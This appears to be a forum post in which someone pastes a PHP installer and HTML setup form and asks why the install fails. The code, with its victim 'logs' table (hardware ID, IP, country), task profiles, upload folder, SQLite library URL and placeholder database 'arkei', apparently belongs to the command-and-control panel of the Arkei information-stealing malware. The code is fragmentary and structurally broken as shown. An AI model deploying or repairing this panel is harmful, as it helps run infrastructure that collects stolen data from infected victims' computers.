The code is:
$db_server = "";
$db_user = "";
$db_password = "";
$db_name = "";
$server_addr = "";
$folder = "";
$adm_login = "user";
$adm_password = md5(checkParam($_POST["user"]));
$sqlite_lib_url = checkParam($_POST[""]);
$error = NULL;
if($config["db_server"] != null)
$database = mysqli_connect($config["db_server"], $config["db_user"], $config["db_password"], $config["db_name"]);
$error = "Can't connect to database.";
header('Location: http://'. $config["server_addr"] .'/index?action=install_success');
$db_server != null &
$db_user != null &
$db_name != null &
$server_addr != null &
$folder != null &
$adm_login != null &
$adm_password != null &
$sqlite_lib_url != null
$config_file = fopen("app/config.php", "w");
$configuration = '<?php $config = array("db_server" => "'. $db_server .'", "db_user" => "'. $db_user .'", "db_password" => "'. $db_password .'", "db_name" => "'. $db_name .'", "server_addr" => "'. $server_addr .'", "folder" => "'. $folder .'", "adm_login" => "'. $adm_login .'", "adm_password" => "'. $adm_password .'" ); ?>';
fwrite($config_file, $configuration);
if (!file_exists('server/'. $folder))
mkdir('server/'. $folder .'/', 0777, true);
$database = mysqli_connect($db_server, $db_user, $db_password, $db_name);
$error = "Can't connect to database.";
$database->query('SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";');
$database->query('SET time_zone = "+00:00";');
$database->query('CREATE TABLE IF NOT EXISTS 'logs' ('id' int(11) NOT NULL AUTO_INCREMENT, 'hwid' text NOT NULL, 'system' text NOT NULL, 'ip' text NOT NULL, 'country' text NOT NULL, 'date' text NOT NULL, 'profile' int(11) NOT NULL, 'count' int(11), 'user' text NOT NULL NOT NULL, PRIMARY KEY ('id')) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;');
$database->query('CREATE TABLE IF NOT EXISTS 'profiles' ('id' int(11) NOT NULL AUTO_INCREMENT, 'Name' text NOT NULL, 'task' text NOT NULL, 'Count' int(11) NOT NULL, PRIMARY KEY ('id')) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;');
$database->query("INSERT INTO 'profiles' ('id', 'Name', 'task', 'Count') VALUES(1, 'Main Profile', 'none;', 0),(2, 'Two Profile', 'none;', 0),(3, 'Three Profile', 'none;', 0),(4, 'Four Profile', 'none;', 0),(5, 'Five Profile', 'none;', 0),(6, 'Six Profile', 'none;', 0),(7, 'Seven Profile', 'none;', 0),(8, 'Eight Profile', 'none;', 0),(9, 'Nine Profile', 'none;', 0),(10, 'Ten Profile', 'none;', 0);");
$database->query('CREATE TABLE IF NOT EXISTS 'stats' ('Name' text NOT NULL, 'Value' text NOT NULL) ENGINE=InnoDB DEFAULT CHARSET=utf8;');
$database->query("INSERT INTO 'stats'('Name', 'Value') VALUES ('all_logs','0')");
$database->query("INSERT INTO 'stats'('Name', 'Value') VALUES ('all_files','0')");
$database->query("INSERT INTO 'stats'('Name', 'Value') VALUES ('errors','0')");
$database->query('CREATE TABLE IF NOT EXISTS 'settings' ('Name' text NOT NULL,'Value' text NOT NULL) ENGINE=InnoDB DEFAULT CHARSET=utf8;');
$database->query("INSERT INTO 'settings'('Name', 'Value') VALUES ('sqlite_lib_url','$sqlite_lib_url')");
header('Location: http://'. $server_addr .'/index');
$error = "Please enter all params!";
function checkParam($param)
$formatted = $param;
$formatted = trim($formatted);
$formatted = stripslashes($formatted);
$formatted = htmlspecialchars($formatted);
return $formatted;
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<form id="install" action="/install" method="post">
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<aside class="c-menu u-ml-medium"></aside>
<div class="col-md-7 col-xl-6">
<h2 class="u-h3 u-mb-small">Install</h2>
if($error != null)
<div class="c-alert c-alert--danger">
<i class="c-alert__icon fa fa-exclamation-triangle"></i> <? echo $error; ?></div>
<div class="c-card u-p-medium u-text-small u-mb-small">
<h6 class="u-text-bold">MySQL Info</h6>
<dl class="u-flex u-pv-small">
<div class="c-field">
<label class="c-field__label " for="db_server">Server Address</label>
<input class="c-input" id="db_server" name="db_server" type="text" placeholder="localhost" value="">
<dl class="u-flex u-pv-small">
<div class="c-field">
<label class="c-field__label " for="db_user">Username</label>
<input class="c-input" id="db_user" name="db_user" type="text" placeholder="root" value="">
<dl class="u-flex u-pv-small">
<div class="c-field">
<label class="c-field__label " for="db_password">Password</label>
<input class="c-input" id="db_password" name="db_password" type="password" placeholder="toor" value="">
<dl class="u-flex u-pv-small">
<div class="c-field">
<label class="c-field__label " for="db_name">Database Name</label>
<input class="c-input" id="db_name" name="db_name" type="text" placeholder="arkei" value="">
<div class="c-card u-p-medium u-mb-small u-text-small">
<h6 class="u-text-bold">Server Info</h6>
<dl class="u-flex u-pv-small">
<div class="c-field">
<label class="c-field__label " for="server_addr">Web-Server Addr</label>
<input class="c-input" id="server_addr" name="server_addr" type="text" placeholder="" value="">
<dl class="u-flex u-pv-small">
<div class="c-field">
<label class="c-field__label " for="folder">Folder to upload logs</label>
<input class="c-input" id="folder" name="folder" type="text" placeholder="_files2387ygsfuasgfd7623t" value="">
<dl class="u-flex u-pv-small">
<div class="c-field">
<label class="c-field__label " for="adm_login">Admin Login</label>
<input class="c-input" id="adm_login" name="adm_login" type="text" placeholder="admin" value="">
<dl class="u-flex u-pv-small">
<div class="c-field">
<label class="c-field__label " for="adm_password">Admin Password</label>
<input class="c-input" id="adm_password" name="adm_password" type="password" placeholder="admin" value="">
<div class="c-card u-p-medium u-mb-small u-text-small">
<h6 class="u-text-bold">Other</h6>
<dl class="u-flex u-pv-small">
<div class="c-field">
<label class="c-field__label " for="sqlite_lib_url">Sqlite Lib Url</label>
<input class="c-input" id="sqlite_lib_url" name="sqlite_lib_url" type="text" placeholder="" value="">
<div class="col u-mb-medium" style="width:200px; margin-right: 50%;">
<a onclick="document.getElementById('install').submit(); return false;" class="c-btn c-btn--success c-btn--fullwidth">Install</a>
<div class="col-md-5 col-xl-3 u-mb-medium u-hidden-down@tablet"></div>
<script src="js/main.min.js"></script>
But he always gives me the same mistakes:
That's an error. The requested URL was not found on this server.